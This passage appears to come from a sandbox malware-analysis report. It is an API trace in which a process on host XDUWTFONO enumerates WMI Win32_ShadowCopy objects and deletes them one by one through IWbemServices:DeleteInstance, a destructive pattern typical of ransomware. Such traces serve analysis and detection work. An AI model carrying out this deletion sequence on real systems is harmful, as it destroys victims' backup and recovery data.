(param_1="Win32_ShadowCopy") returned 0x10 [0127.028] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52d10, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0127.028] WbemDefPath:IWbemPath:GetText (in: This=0x1be52d10, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0127.028] WbemDefPath:IWbemPath:GetText (in: This=0x1be52d10, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x0 [0127.028] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0127.028] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0127.028] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.028] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0127.028] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0127.028] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0127.029] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0127.029] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0127.029] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0127.029] WbemDefPath:IWbemPath:GetText (in: This=0x1be52d10, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0127.029] WbemDefPath:IWbemPath:GetText (in: This=0x1be52d10, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x0 [0127.029] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0128.835] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0128.835] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be56970, puReturned=0x1c90de18*=0x1) returned 0x0 [0128.837] IUnknown:QueryInterface (in: This=0x1be56970, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be56970) returned 0x0 [0128.838] IUnknown:QueryInterface (in: This=0x1be56970, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0128.838] IUnknown:QueryInterface (in: This=0x1be56970, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0128.839] IUnknown:AddRef (This=0x1be56970) returned 0x3 [0128.839] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0128.839] IUnknown:QueryInterface (in: This=0x1be56970, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be56978) returned 0x0 [0128.840] IMarshal:GetUnmarshalClass (in: This=0x1be56978, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0128.840] IUnknown:Release (This=0x1be56978) returned 0x3 [0128.840] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0128.841] IUnknown:AddRef (This=0x1be56970) returned 0x4 [0128.841] IUnknown:QueryInterface (in: This=0x1be56970, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0128.841] IUnknown:Release (This=0x1be56970) returned 0x3 [0128.842] IUnknown:Release (This=0x1be56970) returned 0x2 [0128.842] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0128.842] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0128.842] IUnknown:AddRef (This=0x1be56970) returned 0x3 [0128.843] IUnknown:QueryInterface (in: This=0x1be56970, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be56970) returned 0x0 [0128.843] IUnknown:Release (This=0x1be56970) returned 0x3 [0128.844] IUnknown:Release (This=0x1be56970) returned 0x2 [0128.844] IUnknown:Release (This=0x1be56970) returned 0x1 [0128.844] CoTaskMemFree (pv=0x16a900) [0128.844] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0128.844] IUnknown:AddRef (This=0x1be56970) returned 0x2 [0128.845] IWbemClassObject:Get (in: This=0x1be56970, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0128.845] IWbemClassObject:Get (in: This=0x1be56970, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0128.845] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x53 [0128.845] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0128.846] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0128.846] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0128.846] IUnknown:Release (This=0x142498) returned 0x1 [0128.847] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be51fe0) returned 0x0 [0128.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51fe0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0128.848] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be51fe0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52dd0) returned 0x0 [0128.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52dd0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52dd0) returned 0x0 [0128.849] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52dd0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0128.849] WbemDefPath:IUnknown:AddRef (This=0x1be52dd0) returned 0x3 [0128.849] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0128.849] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52dd0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b936be0) returned 0x0 [0128.850] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b936be0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0128.850] WbemDefPath:IUnknown:Release (This=0x1b936be0) returned 0x3 [0128.850] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0128.850] WbemDefPath:IUnknown:AddRef (This=0x1be52dd0) returned 0x4 [0128.850] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52dd0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0128.851] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x3 [0128.851] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x2 [0128.851] WbemDefPath:IUnknown:Release (This=0x1be51fe0) returned 0x0 [0128.851] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x1 [0128.852] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0128.852] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0128.852] WbemDefPath:IUnknown:AddRef (This=0x1be52dd0) returned 0x2 [0128.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52dd0, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52dd0) returned 0x0 [0128.852] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x2 [0128.852] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x1 [0128.852] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0128.852] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0128.852] WbemDefPath:IUnknown:AddRef (This=0x1be52dd0) returned 0x2 [0128.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52dd0, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52dd0) returned 0x0 [0128.853] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x2 [0128.853] WbemDefPath:IUnknown:AddRef (This=0x1be52dd0) returned 0x3 [0128.853] WbemDefPath:IWbemPath:SetText (This=0x1be52dd0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x0 [0128.853] WbemDefPath:IUnknown:Release (This=0x1be52dd0) returned 0x2 [0128.853] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0128.853] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0128.853] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0128.854] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0128.854] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.854] IWbemClassObject:Get (in: This=0x1be56970, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0128.854] SysStringLen (param_1="root\\cimv2") returned 0xa [0128.854] IWbemClassObject:Get (in: This=0x1be56970, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0128.854] SysStringLen (param_1="root\\cimv2") returned 0xa [0128.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0128.854] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0128.854] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.854] IWbemClassObject:Get (in: This=0x1be56970, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0128.854] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0128.854] IWbemClassObject:Get (in: This=0x1be56970, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0128.855] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0128.855] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52dd0, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0128.855] WbemDefPath:IWbemPath:GetText (in: This=0x1be52dd0, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0128.855] WbemDefPath:IWbemPath:GetText (in: This=0x1be52dd0, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x0 [0128.855] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0128.855] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0128.855] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0128.855] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0128.855] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0128.855] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0128.856] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0128.856] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0128.856] IWbemClassObject:Get (in: This=0x1be56970, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0128.856] WbemDefPath:IWbemPath:GetText (in: This=0x1be52dd0, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0128.856] WbemDefPath:IWbemPath:GetText (in: This=0x1be52dd0, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"") returned 0x0 [0128.856] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0130.584] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0130.584] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be57010, puReturned=0x1c90de18*=0x1) returned 0x0 [0130.586] IUnknown:QueryInterface (in: This=0x1be57010, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be57010) returned 0x0 [0130.586] IUnknown:QueryInterface (in: This=0x1be57010, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0130.586] IUnknown:QueryInterface (in: This=0x1be57010, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0130.586] IUnknown:AddRef (This=0x1be57010) returned 0x3 [0130.587] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0130.587] IUnknown:QueryInterface (in: This=0x1be57010, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be57018) returned 0x0 [0130.587] IMarshal:GetUnmarshalClass (in: This=0x1be57018, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0130.587] IUnknown:Release (This=0x1be57018) returned 0x3 [0130.587] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0130.587] IUnknown:AddRef (This=0x1be57010) returned 0x4 [0130.587] IUnknown:QueryInterface (in: This=0x1be57010, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0130.587] IUnknown:Release (This=0x1be57010) returned 0x3 [0130.587] IUnknown:Release (This=0x1be57010) returned 0x2 [0130.588] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0130.588] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0130.588] IUnknown:AddRef (This=0x1be57010) returned 0x3 [0130.588] IUnknown:QueryInterface (in: This=0x1be57010, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be57010) returned 0x0 [0130.588] IUnknown:Release (This=0x1be57010) returned 0x3 [0130.588] IUnknown:Release (This=0x1be57010) returned 0x2 [0130.588] IUnknown:Release (This=0x1be57010) returned 0x1 [0130.588] CoTaskMemFree (pv=0x16a900) [0130.588] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0130.588] IUnknown:AddRef (This=0x1be57010) returned 0x2 [0130.588] IWbemClassObject:Get (in: This=0x1be57010, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0130.589] IWbemClassObject:Get (in: This=0x1be57010, 